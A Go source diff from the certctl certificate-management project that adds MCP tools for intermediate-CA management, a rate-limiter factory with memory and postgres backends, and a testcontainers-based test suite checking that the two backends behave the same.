// is the MCP counterpart of the GUI's Dead letter tab "Requeue" button.
|
||||||
|
gomcp.AddTool(s, &gomcp.Tool{
|
||||||
|
Name: "certctl_requeue_notification",
|
||||||
|
Description: "Requeue a dead notification back to pending so the retry sweep can deliver it again. Used to recover from persistent delivery failures after the underlying issue (SMTP config, webhook endpoint, etc.) has been fixed.",
|
||||||
|
}, func(ctx context.Context, req *gomcp.CallToolRequest, input GetByIDInput) (*gomcp.CallToolResult, any, error) {
|
||||||
|
data, err := c.Post("/api/v1/notifications/"+input.ID+"/requeue", nil)
|
||||||
|
if err != nil {
|
||||||
|
return errorResult(err)
|
||||||
|
}
|
||||||
|
return textResult(data)
|
||||||
|
})
|
||||||
|
}
|
||||||
|
|
||||||
|
// ── Intermediate CAs (Phase F — P1-6..P1-9) ─────────────────────────
|
||||||
|
//
|
||||||
|
// 2026-05-05 CLI/API/MCP↔GUI parity audit closure. Rank 8 primitive
|
||||||
|
// (multi-level CA hierarchy management). The handlers are admin-gated via
|
||||||
|
// auth.IsAdmin — non-admin callers see HTTP 403 regardless of MCP
|
||||||
|
// surface. We expose the full management API rather than carving it off
|
||||||
|
// because the operator ran the original Rank 8 deliverable to make this
|
||||||
|
// a first-class managed primitive; gating by API key role at the handler
|
||||||
|
// layer is the correct least-privilege boundary, not by transport.
|
||||||
|
|
||||||
|
func registerIntermediateCATools(s *gomcp.Server, c *Client) {
|
||||||
|
gomcp.AddTool(s, &gomcp.Tool{
|
||||||
|
Name: "certctl_list_intermediate_cas",
|
||||||
|
Description: "List the intermediate-CA hierarchy under a parent issuer (GET /api/v1/issuers/{id}/intermediates). Admin-gated route. Returns flat rows; callers render the tree from each row's parent_ca_id.",
|
||||||
|
}, func(ctx context.Context, req *gomcp.CallToolRequest, input ListIntermediateCAsInput) (*gomcp.CallToolResult, any, error) {
|
||||||
|
data, err := c.Get("/api/v1/issuers/"+input.IssuerID+"/intermediates", nil)
|
||||||
|
if err != nil {
|
||||||
|
return errorResult(err)
|
||||||
|
}
|
||||||
|
return textResult(data)
|
||||||
|
})
|
||||||
|
|
||||||
|
gomcp.AddTool(s, &gomcp.Tool{
|
||||||
|
Name: "certctl_create_intermediate_ca",
|
||||||
|
Description: "Create an intermediate CA under a parent issuer (POST /api/v1/issuers/{id}/intermediates). Admin-gated. Discriminator: when parent_ca_id is empty AND root_cert_pem + key_driver_id are present, registers an operator-supplied root CA; otherwise signs a child under the named parent.",
|
||||||
|
}, func(ctx context.Context, req *gomcp.CallToolRequest, input CreateIntermediateCAInput) (*gomcp.CallToolResult, any, error) {
|
||||||
|
body := map[string]any{"name": input.Name}
|
||||||
|
if input.ParentCAID != "" {
|
||||||
|
body["parent_ca_id"] = input.ParentCAID
|
||||||
|
}
|
||||||
|
if input.RootCertPEM != "" {
|
||||||
|
body["root_cert_pem"] = input.RootCertPEM
|
||||||
|
}
|
||||||
|
if input.KeyDriverID != "" {
|
||||||
|
body["key_driver_id"] = input.KeyDriverID
|
||||||
|
}
|
||||||
|
if len(input.Subject) > 0 {
|
||||||
|
body["subject"] = input.Subject
|
||||||
|
}
|
||||||
|
if input.Algorithm != "" {
|
||||||
|
body["algorithm"] = input.Algorithm
|
||||||
|
}
|
||||||
|
if input.TTLDays > 0 {
|
||||||
|
body["ttl_days"] = input.TTLDays
|
||||||
|
}
|
||||||
|
if input.PathLenConstraint != nil {
|
||||||
|
body["path_len_constraint"] = *input.PathLenConstraint
|
||||||
|
}
|
||||||
|
if len(input.NameConstraints) > 0 {
|
||||||
|
body["name_constraints"] = input.NameConstraints
|
||||||
|
}
|
||||||
|
if input.OCSPResponderURL != "" {
|
||||||
|
body["ocsp_responder_url"] = input.OCSPResponderURL
|
||||||
|
}
|
||||||
|
if len(input.Metadata) > 0 {
|
||||||
|
body["metadata"] = input.Metadata
|
||||||
|
}
|
||||||
|
data, err := c.Post("/api/v1/issuers/"+input.IssuerID+"/intermediates", body)
|
||||||
|
if err != nil {
|
||||||
|
return errorResult(err)
|
||||||
|
}
|
||||||
|
return textResult(data)
|
||||||
|
})
|
||||||
|
|
||||||
|
gomcp.AddTool(s, &gomcp.Tool{
|
||||||
|
Name: "certctl_get_intermediate_ca",
|
||||||
|
Description: "Get a single intermediate CA (GET /api/v1/intermediates/{id}). Admin-gated.",
|
||||||
|
}, func(ctx context.Context, req *gomcp.CallToolRequest, input GetByIDInput) (*gomcp.CallToolResult, any, error) {
|
||||||
|
data, err := c.Get("/api/v1/intermediates/"+input.ID, nil)
|
||||||
|
if err != nil {
|
||||||
|
return errorResult(err)
|
||||||
|
}
|
||||||
|
return textResult(data)
|
||||||
|
})
|
||||||
|
|
||||||
|
gomcp.AddTool(s, &gomcp.Tool{
|
||||||
|
Name: "certctl_retire_intermediate_ca",
|
||||||
|
Description: "Retire an intermediate CA (POST /api/v1/intermediates/{id}/retire). Admin-gated. Two-phase: first call (confirm=false) transitions active→retiring; second call (confirm=true) transitions retiring→retired. Refuses retired transition while active children remain (drain-first semantics).",
|
||||||
|
}, func(ctx context.Context, req *gomcp.CallToolRequest, input RetireIntermediateCAInput) (*gomcp.CallToolResult, any, error) {
|
||||||
|
body := struct {
|
||||||
|
Note string `json:"note,omitempty"`
|
||||||
|
Confirm bool `json:"confirm,omitempty"`
|
||||||
|
}{Note: input.Note, Confirm: input.Confirm}
|
||||||
|
data, err := c.Post("/api/v1/intermediates/"+input.ID+"/retire", body)
|
||||||
|
if err != nil {
|
||||||
|
return errorResult(err)
|
||||||
|
}
|
||||||
|
return textResult(data)
|
||||||
|
})
|
||||||
|
}
|
||||||
@@ -0,0 +1,412 @@
|
|||||||
|
// Copyright 2026 certctl LLC. All rights reserved.
|
||||||
|
// SPDX-License-Identifier: BUSL-1.1
|
||||||
|
|
||||||
|
package ratelimit_test
|
||||||
|
|
||||||
|
import (
|
||||||
|
"context"
|
||||||
|
"database/sql"
|
||||||
|
"errors"
|
||||||
|
"fmt"
|
||||||
|
"os"
|
||||||
|
"path/filepath"
|
||||||
|
"runtime"
|
||||||
|
"strings"
|
||||||
|
"sync"
|
||||||
|
"testing"
|
||||||
|
"time"
|
||||||
|
|
||||||
|
_ "github.com/lib/pq"
|
||||||
|
"github.com/testcontainers/testcontainers-go"
|
||||||
|
"github.com/testcontainers/testcontainers-go/wait"
|
||||||
|
|
||||||
|
"github.com/certctl-io/certctl/internal/ratelimit"
|
||||||
|
)
|
||||||
|
|
||||||
|
// Phase 13 Sprint 13.2 closure (2026-05-14, architecture diligence audit
|
||||||
|
// ARCH-M1): backend-equivalence test suite. Runs the same scenario
|
||||||
|
// surface against both backends (in-memory + postgres) via the shared
|
||||||
|
// Limiter interface — if the postgres backend's caller-visible
|
||||||
|
// semantics drift from the memory backend's, this file fails first.
|
||||||
|
//
|
||||||
|
// Mirrors the white-box test names in sliding_window_test.go: every
|
||||||
|
// public-surface behavior pinned there (cap, expiry, disabled bypass,
|
||||||
|
// empty-key short-circuit, concurrency) gets re-pinned here for the
|
||||||
|
// postgres backend.
|
||||||
|
//
|
||||||
|
// Postgres tests skip under -short (matches the pattern in
|
||||||
|
// internal/repository/postgres/testutil_test.go); CI's
|
||||||
|
// `go test -race -short -count=1 ./...` exercises only the memory
|
||||||
|
// half. The integration job runs the full suite.
|
||||||
|
|
||||||
|
// ----------------------------------------------------------------
|
||||||
|
// Backend-equivalence helpers
|
||||||
|
// ----------------------------------------------------------------
|
||||||
|
|
||||||
|
// limiterFactory builds a fresh Limiter for one test case.
|
||||||
|
// Memory backends discard `db`; postgres backends use it.
|
||||||
|
type limiterFactory func(
	t *testing.T,
	db *sql.DB,
	maxN int,
	window time.Duration,
) ratelimit.Limiter
|
||||||
|
|
||||||
|
func memoryFactory(t *testing.T, _ *sql.DB, maxN int, window time.Duration) ratelimit.Limiter {
|
||||||
|
t.Helper()
|
||||||
|
// Map cap of 10_000 — large enough that none of the equivalence
|
||||||
|
// scenarios trip the LRU-eviction branch (the eviction branch is
|
||||||
|
// memory-specific; postgres has no equivalent so it's not part of
|
||||||
|
// the cross-backend contract).
|
||||||
|
return ratelimit.NewSlidingWindowLimiter(maxN, window, 10_000)
|
||||||
|
}
|
||||||
|
|
||||||
|
func postgresFactory(t *testing.T, db *sql.DB, maxN int, window time.Duration) ratelimit.Limiter {
|
||||||
|
t.Helper()
|
||||||
|
if db == nil {
|
||||||
|
t.Fatal("postgresFactory requires a non-nil *sql.DB")
|
||||||
|
}
|
||||||
|
return ratelimit.NewPostgresSlidingWindowLimiter(db, maxN, window)
|
||||||
|
}
|
||||||
|
|
||||||
|
// ----------------------------------------------------------------
|
||||||
|
// Per-backend test entry points
|
||||||
|
// ----------------------------------------------------------------
|
||||||
|
|
||||||
|
func TestSlidingWindowLimiter_Equivalence_Memory(t *testing.T) {
|
||||||
|
t.Run("AllowsUpToCap", func(t *testing.T) { caseAllowsUpToCap(t, memoryFactory, nil) })
|
||||||
|
t.Run("DistinctKeysIndependent", func(t *testing.T) { caseDistinctKeysIndependent(t, memoryFactory, nil) })
|
||||||
|
t.Run("WindowExpiry", func(t *testing.T) { caseWindowExpiry(t, memoryFactory, nil) })
|
||||||
|
t.Run("DisabledBypass", func(t *testing.T) { caseDisabledBypass(t, memoryFactory, nil) })
|
||||||
|
t.Run("NegativeCapDisabled", func(t *testing.T) { caseNegativeCapDisabled(t, memoryFactory, nil) })
|
||||||
|
t.Run("EmptyKeyShortCircuits", func(t *testing.T) { caseEmptyKeyShortCircuits(t, memoryFactory, nil) })
|
||||||
|
t.Run("ConcurrentRaceFree", func(t *testing.T) {
|
||||||
|
if testing.Short() {
|
||||||
|
t.Skip("race-style test under -short")
|
||||||
|
}
|
||||||
|
caseConcurrentRaceFree(t, memoryFactory, nil)
|
||||||
|
})
|
||||||
|
}
|
||||||
|
|
||||||
|
func TestSlidingWindowLimiter_Equivalence_Postgres(t *testing.T) {
|
||||||
|
if testing.Short() {
|
||||||
|
t.Skip("postgres equivalence tests require testcontainers; skipped under -short")
|
||||||
|
}
|
||||||
|
tdb := setupTestDB(t)
|
||||||
|
defer tdb.teardown(t)
|
||||||
|
|
||||||
|
t.Run("AllowsUpToCap", func(t *testing.T) {
|
||||||
|
db := tdb.freshSchema(t, "AllowsUpToCap")
|
||||||
|
caseAllowsUpToCap(t, postgresFactory, db)
|
||||||
|
})
|
||||||
|
t.Run("DistinctKeysIndependent", func(t *testing.T) {
|
||||||
|
db := tdb.freshSchema(t, "DistinctKeysIndependent")
|
||||||
|
caseDistinctKeysIndependent(t, postgresFactory, db)
|
||||||
|
})
|
||||||
|
t.Run("WindowExpiry", func(t *testing.T) {
|
||||||
|
db := tdb.freshSchema(t, "WindowExpiry")
|
||||||
|
caseWindowExpiry(t, postgresFactory, db)
|
||||||
|
})
|
||||||
|
t.Run("DisabledBypass", func(t *testing.T) {
|
||||||
|
db := tdb.freshSchema(t, "DisabledBypass")
|
||||||
|
caseDisabledBypass(t, postgresFactory, db)
|
||||||
|
})
|
||||||
|
t.Run("NegativeCapDisabled", func(t *testing.T) {
|
||||||
|
db := tdb.freshSchema(t, "NegativeCapDisabled")
|
||||||
|
caseNegativeCapDisabled(t, postgresFactory, db)
|
||||||
|
})
|
||||||
|
t.Run("EmptyKeyShortCircuits", func(t *testing.T) {
|
||||||
|
db := tdb.freshSchema(t, "EmptyKeyShortCircuits")
|
||||||
|
caseEmptyKeyShortCircuits(t, postgresFactory, db)
|
||||||
|
})
|
||||||
|
t.Run("ConcurrentRaceFree", func(t *testing.T) {
|
||||||
|
db := tdb.freshSchema(t, "ConcurrentRaceFree")
|
||||||
|
caseConcurrentRaceFree(t, postgresFactory, db)
|
||||||
|
})
|
||||||
|
}
|
||||||
|
|
||||||
|
// ----------------------------------------------------------------
|
||||||
|
// Backend-agnostic test cases (one per behavior pinned in
|
||||||
|
// sliding_window_test.go's public-surface tests)
|
||||||
|
// ----------------------------------------------------------------
|
||||||
|
|
||||||
|
func caseAllowsUpToCap(t *testing.T, mk limiterFactory, db *sql.DB) {
|
||||||
|
l := mk(t, db, 3, 24*time.Hour)
|
||||||
|
now := time.Now()
|
||||||
|
for i := 0; i < 3; i++ {
|
||||||
|
if err := l.Allow("k", now.Add(time.Duration(i)*time.Minute)); err != nil {
|
||||||
|
t.Fatalf("call %d should be allowed: %v", i+1, err)
|
||||||
|
}
|
||||||
|
}
|
||||||
|
if err := l.Allow("k", now.Add(4*time.Minute)); !errors.Is(err, ratelimit.ErrRateLimited) {
|
||||||
|
t.Fatalf("4th call should be rate-limited; got %v", err)
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
func caseDistinctKeysIndependent(t *testing.T, mk limiterFactory, db *sql.DB) {
|
||||||
|
l := mk(t, db, 1, 24*time.Hour)
|
||||||
|
now := time.Now()
|
||||||
|
|
||||||
|
if err := l.Allow("k-1", now); err != nil {
|
||||||
|
t.Fatalf("first allow: %v", err)
|
||||||
|
}
|
||||||
|
if err := l.Allow("k-2", now); err != nil {
|
||||||
|
t.Fatalf("different key must have its own bucket: %v", err)
|
||||||
|
}
|
||||||
|
if err := l.Allow("k-1", now.Add(1*time.Second)); !errors.Is(err, ratelimit.ErrRateLimited) {
|
||||||
|
t.Fatalf("repeat key should be limited; got %v", err)
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
func caseWindowExpiry(t *testing.T, mk limiterFactory, db *sql.DB) {
|
||||||
|
l := mk(t, db, 2, 1*time.Hour)
|
||||||
|
now := time.Now()
|
||||||
|
|
||||||
|
if err := l.Allow("k", now); err != nil {
|
||||||
|
t.Fatal(err)
|
||||||
|
}
|
||||||
|
if err := l.Allow("k", now.Add(30*time.Minute)); err != nil {
|
||||||
|
t.Fatal(err)
|
||||||
|
}
|
||||||
|
// Inside window — limited.
|
||||||
|
if err := l.Allow("k", now.Add(45*time.Minute)); !errors.Is(err, ratelimit.ErrRateLimited) {
|
||||||
|
t.Fatalf("inside-window 3rd call should be limited: %v", err)
|
||||||
|
}
|
||||||
|
// Past window — slots reopen.
|
||||||
|
if err := l.Allow("k", now.Add(2*time.Hour)); err != nil {
|
||||||
|
t.Fatalf("past-window call should be allowed (window reset): %v", err)
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
func caseDisabledBypass(t *testing.T, mk limiterFactory, db *sql.DB) {
|
||||||
|
l := mk(t, db, 0, 24*time.Hour) // maxN=0 → disabled
|
||||||
|
type disablable interface {
|
||||||
|
Disabled() bool
|
||||||
|
}
|
||||||
|
if d, ok := l.(disablable); ok && !d.Disabled() {
|
||||||
|
t.Fatal("limiter with maxN=0 must report Disabled()=true")
|
||||||
|
}
|
||||||
|
now := time.Now()
|
||||||
|
for i := 0; i < 100; i++ {
|
||||||
|
if err := l.Allow("k", now); err != nil {
|
||||||
|
t.Fatalf("disabled limiter must allow everything: %v", err)
|
||||||
|
}
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
func caseNegativeCapDisabled(t *testing.T, mk limiterFactory, db *sql.DB) {
|
||||||
|
l := mk(t, db, -1, 24*time.Hour)
|
||||||
|
type disablable interface {
|
||||||
|
Disabled() bool
|
||||||
|
}
|
||||||
|
if d, ok := l.(disablable); ok && !d.Disabled() {
|
||||||
|
t.Fatal("negative maxN must produce a disabled limiter")
|
||||||
|
}
|
||||||
|
now := time.Now()
|
||||||
|
if err := l.Allow("k", now); err != nil {
|
||||||
|
t.Fatalf("disabled limiter must allow: %v", err)
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
func caseEmptyKeyShortCircuits(t *testing.T, mk limiterFactory, db *sql.DB) {
|
||||||
|
// Empty key is the caller's defense-in-depth case — caller's
|
||||||
|
// validation upstream should reject empty-key events first. Limiter
|
||||||
|
// must not build a single shared bucket keyed by empty-key — that
|
||||||
|
// would be a chokepoint for every empty-key event.
|
||||||
|
l := mk(t, db, 1, 24*time.Hour)
|
||||||
|
now := time.Now()
|
||||||
|
for i := 0; i < 50; i++ {
|
||||||
|
if err := l.Allow("", now); err != nil {
|
||||||
|
t.Fatalf("empty key must short-circuit (call %d): %v", i, err)
|
||||||
|
}
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
func caseConcurrentRaceFree(t *testing.T, mk limiterFactory, db *sql.DB) {
|
||||||
|
l := mk(t, db, 50, 24*time.Hour)
|
||||||
|
var wg sync.WaitGroup
|
||||||
|
for g := 0; g < 20; g++ {
|
||||||
|
wg.Add(1)
|
||||||
|
go func(id int) {
|
||||||
|
defer wg.Done()
|
||||||
|
now := time.Now()
|
||||||
|
key := fmt.Sprintf("k-%d", id)
|
||||||
|
for i := 0; i < 30; i++ {
|
||||||
|
_ = l.Allow(key, now)
|
||||||
|
}
|
||||||
|
}(g)
|
||||||
|
}
|
||||||
|
wg.Wait()
|
||||||
|
}
|
||||||
|
|
||||||
|
// ----------------------------------------------------------------
|
||||||
|
// Postgres-only testcontainers harness — mirrors
|
||||||
|
// internal/repository/postgres/testutil_test.go's setupTestDB +
|
||||||
|
// freshSchema pattern.
|
||||||
|
// ----------------------------------------------------------------
|
||||||
|
|
||||||
|
type testDB struct {
|
||||||
|
db *sql.DB
|
||||||
|
container testcontainers.Container
|
||||||
|
}
|
||||||
|
|
||||||
|
func setupTestDB(t *testing.T) *testDB {
|
||||||
|
t.Helper()
|
||||||
|
ctx := context.Background()
|
||||||
|
|
||||||
|
req := testcontainers.ContainerRequest{
|
||||||
|
Image: "postgres:16-alpine",
|
||||||
|
ExposedPorts: []string{"5432/tcp"},
|
||||||
|
Env: map[string]string{
|
||||||
|
"POSTGRES_DB": "certctl_test",
|
||||||
|
"POSTGRES_USER": "certctl",
|
||||||
|
"POSTGRES_PASSWORD": "certctl",
|
||||||
|
},
|
||||||
|
WaitingFor: wait.ForLog("database system is ready to accept connections").WithOccurrence(2),
|
||||||
|
}
|
||||||
|
container, err := testcontainers.GenericContainer(ctx, testcontainers.GenericContainerRequest{
|
||||||
|
ContainerRequest: req,
|
||||||
|
Started: true,
|
||||||
|
})
|
||||||
|
if err != nil {
|
||||||
|
t.Fatalf("start postgres container: %v", err)
|
||||||
|
}
|
||||||
|
|
||||||
|
host, err := container.Host(ctx)
|
||||||
|
if err != nil {
|
||||||
|
t.Fatalf("container host: %v", err)
|
||||||
|
}
|
||||||
|
port, err := container.MappedPort(ctx, "5432")
|
||||||
|
if err != nil {
|
||||||
|
t.Fatalf("container port: %v", err)
|
||||||
|
}
|
||||||
|
|
||||||
|
connStr := fmt.Sprintf("postgres://certctl:certctl@%s:%s/certctl_test?sslmode=disable", host, port.Port())
|
||||||
|
db, err := sql.Open("postgres", connStr)
|
||||||
|
if err != nil {
|
||||||
|
t.Fatalf("open db: %v", err)
|
||||||
|
}
|
||||||
|
// Pool size > 1 so the multi-goroutine concurrency case can hold
|
||||||
|
// multiple connections simultaneously; the row-lock arbitrates.
|
||||||
|
db.SetMaxOpenConns(8)
|
||||||
|
|
||||||
|
if err := db.Ping(); err != nil {
|
||||||
|
t.Fatalf("ping: %v", err)
|
||||||
|
}
|
||||||
|
|
||||||
|
return &testDB{db: db, container: container}
|
||||||
|
}
|
||||||
|
|
||||||
|
func (tdb *testDB) teardown(t *testing.T) {
|
||||||
|
t.Helper()
|
||||||
|
if tdb.db != nil {
|
||||||
|
tdb.db.Close()
|
||||||
|
}
|
||||||
|
if tdb.container != nil {
|
||||||
|
_ = tdb.container.Terminate(context.Background())
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
// freshSchema creates an isolated schema per test case + runs the
|
||||||
|
// rate_limit_buckets migration inside it. Returns a *sql.DB whose
|
||||||
|
// search_path is scoped to the new schema.
|
||||||
|
//
|
||||||
|
// Note: this helper takes a sub-test label (caller-supplied) so the
|
||||||
|
// schema name is deterministic-per-case + stable across runs. The
|
||||||
|
// canonical postgres testutil uses t.Name() but we're inside Run-
|
||||||
|
// nested subtests where t.Name() includes "/" — flatten it.
|
||||||
|
func (tdb *testDB) freshSchema(t *testing.T, label string) *sql.DB {
|
||||||
|
t.Helper()
|
||||||
|
schema := sanitizeSchemaName(label + "_" + t.Name())
|
||||||
|
ctx := context.Background()
|
||||||
|
|
||||||
|
// One connection-scoped session so SET search_path persists.
|
||||||
|
conn, err := tdb.db.Conn(ctx)
|
||||||
|
if err != nil {
|
||||||
|
t.Fatalf("acquire conn: %v", err)
|
||||||
|
}
|
||||||
|
|
||||||
|
if _, err := conn.ExecContext(ctx, fmt.Sprintf("CREATE SCHEMA IF NOT EXISTS %s", schema)); err != nil {
|
||||||
|
t.Fatalf("create schema: %v", err)
|
||||||
|
}
|
||||||
|
if _, err := conn.ExecContext(ctx, fmt.Sprintf("SET search_path TO %s, public", schema)); err != nil {
|
||||||
|
t.Fatalf("set search_path: %v", err)
|
||||||
|
}
|
||||||
|
|
||||||
|
// Run the rate_limit_buckets migration in this schema. The migration
|
||||||
|
// is the only one that introduces our table; other migrations don't
|
||||||
|
// matter for limiter behavior.
|
||||||
|
migPath := findMigration("000046_rate_limit_buckets.up.sql")
|
||||||
|
body, err := os.ReadFile(migPath)
|
||||||
|
if err != nil {
|
||||||
|
t.Fatalf("read migration: %v", err)
|
||||||
|
}
|
||||||
|
if _, err := conn.ExecContext(ctx, string(body)); err != nil {
|
||||||
|
t.Fatalf("apply migration: %v", err)
|
||||||
|
}
|
||||||
|
|
||||||
|
t.Cleanup(func() {
|
||||||
|
conn.ExecContext(context.Background(), fmt.Sprintf("DROP SCHEMA IF EXISTS %s CASCADE", schema))
|
||||||
|
conn.Close()
|
||||||
|
})
|
||||||
|
|
||||||
|
// Wrap the single connection in a *sql.DB-like by returning a fresh
|
||||||
|
// pool that goes through the same search_path. Simpler: just return
|
||||||
|
// the underlying *sql.DB and SET search_path session-wide by re-
|
||||||
|
// running the SET on every checkout. The cleanest move is to use
|
||||||
|
// the per-connection helper: return a *sql.DB that's actually a
|
||||||
|
// "limited to N=1 connection with search_path pinned" handle.
|
||||||
|
//
|
||||||
|
// Workaround the easy way: build a fresh *sql.DB whose dsn embeds
|
||||||
|
// search_path as a connection-time setting, so every connection
|
||||||
|
// auto-applies it.
|
||||||
|
dsn := connDSNWithSearchPath(tdb, schema)
|
||||||
|
scoped, err := sql.Open("postgres", dsn)
|
||||||
|
if err != nil {
|
||||||
|
t.Fatalf("open scoped db: %v", err)
|
||||||
|
}
|
||||||
|
scoped.SetMaxOpenConns(8)
|
||||||
|
t.Cleanup(func() { scoped.Close() })
|
||||||
|
|
||||||
|
// Sanity: row exists / table exists.
|
||||||
|
if _, err := scoped.ExecContext(ctx, "SELECT 1 FROM rate_limit_buckets LIMIT 1"); err != nil && !strings.Contains(err.Error(), "no rows") {
|
||||||
|
// Empty table is fine; only a missing-table error matters.
|
||||||
|
// "no rows" never fires here (we used Exec not Query).
|
||||||
|
t.Fatalf("smoke select: %v", err)
|
||||||
|
}
|
||||||
|
|
||||||
|
return scoped
|
||||||
|
}
|
||||||
|
|
||||||
|
func connDSNWithSearchPath(tdb *testDB, schema string) string {
|
||||||
|
// Derive the DSN by introspection of the container's host/port.
|
||||||
|
// Couldn't pre-store because freshSchema can be called many times.
|
||||||
|
ctx := context.Background()
|
||||||
|
host, _ := tdb.container.Host(ctx)
|
||||||
|
port, _ := tdb.container.MappedPort(ctx, "5432")
|
||||||
|
return fmt.Sprintf(
|
||||||
|
"postgres://certctl:certctl@%s:%s/certctl_test?sslmode=disable&search_path=%s,public",
|
||||||
|
host, port.Port(), schema,
|
||||||
|
)
|
||||||
|
}
|
||||||
|
|
||||||
|
// sanitizeSchemaName turns an arbitrary label (typically built from a test
// name) into a string usable as an unquoted schema identifier.
//
// The input is lower-cased, every character outside [a-z0-9_] is replaced
// with "_", the result is cut to at most 50 bytes, and "test_rl_" is
// prefixed. Replacing by allow-list rather than a fixed list of separators
// matters because the result is spliced into SQL text unquoted and test
// names can contain characters such as '#', '=', quotes or ';'. After the
// mapping the string is pure ASCII, so the byte-wise cut can never split a
// multi-byte character.
func sanitizeSchemaName(name string) string {
	clean := strings.Map(func(r rune) rune {
		switch {
		case r >= 'a' && r <= 'z', r >= '0' && r <= '9', r == '_':
			return r
		default:
			return '_'
		}
	}, strings.ToLower(name))

	if len(clean) > 50 {
		clean = clean[:50]
	}
	return "test_rl_" + clean
}
|
||||||
|
|
||||||
|
// findMigration looks for migrations/<filename>, starting in the directory
// of this source file and climbing towards the filesystem root. It probes at
// most six directories and returns the first path that exists, or "" when
// none does.
func findMigration(filename string) string {
	// here = .../internal/ratelimit/equivalence_test.go
	// migrations = .../migrations
	_, here, _, _ := runtime.Caller(0)

	const maxLevels = 6
	for dir, level := filepath.Dir(here), 0; level < maxLevels; dir, level = filepath.Dir(dir), level+1 {
		candidate := filepath.Join(dir, "migrations", filename)
		if _, err := os.Stat(candidate); err != nil {
			continue
		}
		return candidate
	}
	return ""
}
|
||||||
@@ -0,0 +1,65 @@
|
|||||||
|
// Copyright 2026 certctl LLC. All rights reserved.
|
||||||
|
// SPDX-License-Identifier: BUSL-1.1
|
||||||
|
|
||||||
|
package ratelimit
|
||||||
|
|
||||||
|
import (
|
||||||
|
"database/sql"
|
||||||
|
"fmt"
|
||||||
|
"time"
|
||||||
|
)
|
||||||
|
|
||||||
|
// Phase 13 Sprint 13.3 (2026-05-14, architecture diligence audit
|
||||||
|
// ARCH-M1): the backend-selector factory. Wires every
|
||||||
|
// `ratelimit.NewSlidingWindowLimiter(...)` call site in
|
||||||
|
// cmd/server/main.go through here so the operator-chosen backend
|
||||||
|
// (CERTCTL_RATE_LIMIT_BACKEND={memory,postgres}) gates the limiter
|
||||||
|
// type without each call site replicating the switch.
|
||||||
|
//
|
||||||
|
// Caller-visible behavior contract: NewLimiter(backend="memory", ...)
|
||||||
|
// returns a *SlidingWindowLimiter identical to a direct
|
||||||
|
// NewSlidingWindowLimiter call. NewLimiter(backend="postgres", ...)
|
||||||
|
// returns a *PostgresSlidingWindowLimiter with the same Allow(key, now)
|
||||||
|
// signature + the same ErrRateLimited sentinel + the same maxN<=0
|
||||||
|
// disabled semantics. Sprint 13.3's "no signature change" rule is
|
||||||
|
// what makes the swap drop-in.
|
||||||
|
//
|
||||||
|
// The mapCap argument is the in-memory backend's per-instance
|
||||||
|
// key-cap (LRU-evicted under pressure). Postgres backend has no
|
||||||
|
// equivalent — the table grows until the scheduler janitor sweeps
|
||||||
|
// stale rows; mapCap is accepted + ignored for that backend so the
|
||||||
|
// factory signature stays drop-in identical to NewSlidingWindowLimiter.
|
||||||
|
|
||||||
|
// NewLimiter returns a Limiter backed by either the in-memory
|
||||||
|
// SlidingWindowLimiter (backend="memory") or the
|
||||||
|
// PostgresSlidingWindowLimiter (backend="postgres").
|
||||||
|
//
|
||||||
|
// `backend` is validated by config.Validate() at startup; any other
|
||||||
|
// value here panics — config validation is the SoT, this is just
|
||||||
|
// defensive in case the call site somehow bypasses startup
|
||||||
|
// validation.
|
||||||
|
//
|
||||||
|
// `db` is required when backend="postgres" and ignored when
|
||||||
|
// backend="memory". The factory does not nil-check db for the
|
||||||
|
// memory branch because requiring a meaningful db handle for the
|
||||||
|
// memory path would couple every limiter call site to the database
|
||||||
|
// pool unnecessarily.
|
||||||
|
//
|
||||||
|
// `maxN <= 0` disables the limiter (both backends honor the
|
||||||
|
// opt-out — all Allow calls return nil).
|
||||||
|
func NewLimiter(backend string, db *sql.DB, maxN int, window time.Duration, mapCap int) Limiter {
|
||||||
|
switch backend {
|
||||||
|
case "memory":
|
||||||
|
return NewSlidingWindowLimiter(maxN, window, mapCap)
|
||||||
|
case "postgres":
|
||||||
|
if db == nil {
|
||||||
|
panic("ratelimit.NewLimiter: backend=postgres requires a non-nil *sql.DB (config.Validate should have caught this earlier)")
|
||||||
|
}
|
||||||
|
return NewPostgresSlidingWindowLimiter(db, maxN, window)
|
||||||
|
default:
|
||||||
|
// Defensive — config.Validate() rejects anything else at
|
||||||
|
// startup. Reaching this branch implies a coding error in a
|
||||||
|
// future call site that bypasses validation.
|
||||||
|
panic(fmt.Sprintf("ratelimit.NewLimiter: unknown backend %q (must be memory or postgres)", backend))
|
||||||
|
}
|
||||||
|
}
|
||||||
@@ -0,0 +1,54 @@
|
|||||||
|
// Copyright 2026 certctl LLC. All rights reserved.
|
||||||
|
// SPDX-License-Identifier: BUSL-1.1
|
||||||
|
|
||||||
|
package ratelimit
|
||||||
|
|
||||||
|
import "time"
|
||||||
|
|
||||||
|
// Limiter is the rate-limit primitive every caller in cmd/server +
|
||||||
|
// internal/api/handler + internal/service consumes. Two backends
|
||||||
|
// satisfy this interface:
|
||||||
|
//
|
||||||
|
// - SlidingWindowLimiter (in-memory; the historical default;
|
||||||
|
// declared in sliding_window.go).
|
||||||
|
// - PostgresSlidingWindowLimiter (cross-replica-consistent;
|
||||||
|
// declared in postgres_sliding_window.go; introduced in Phase 13
|
||||||
|
// Sprint 13.2 for the ARCH-M1 substantive close).
|
||||||
|
//
|
||||||
|
// Sprint 13.3 wires every call site through the operator-chosen
// backend via the CERTCTL_RATE_LIMIT_BACKEND={memory,postgres} env var
// (spelling as used in the NewLimiter factory's documentation). Before
// that wiring lands, both backends compile and the tests for both pass,
// but the production call sites still construct SlidingWindowLimiter
// directly.
|
||||||
|
//
|
||||||
|
// Sprint 13.2 signature note: the prompt template specified
|
||||||
|
// `Allow(key string) error`, but the actual repo signature has been
|
||||||
|
// `Allow(key string, now time.Time) error` since the EST RFC 7030
|
||||||
|
// hardening master bundle Phase 4.1 — the `now` parameter is what
|
||||||
|
// makes the memory limiter testable against synthetic time. The
|
||||||
|
// interface matches the actual signature so the existing
|
||||||
|
// SlidingWindowLimiter satisfies Limiter without a method-set change.
|
||||||
|
//
|
||||||
|
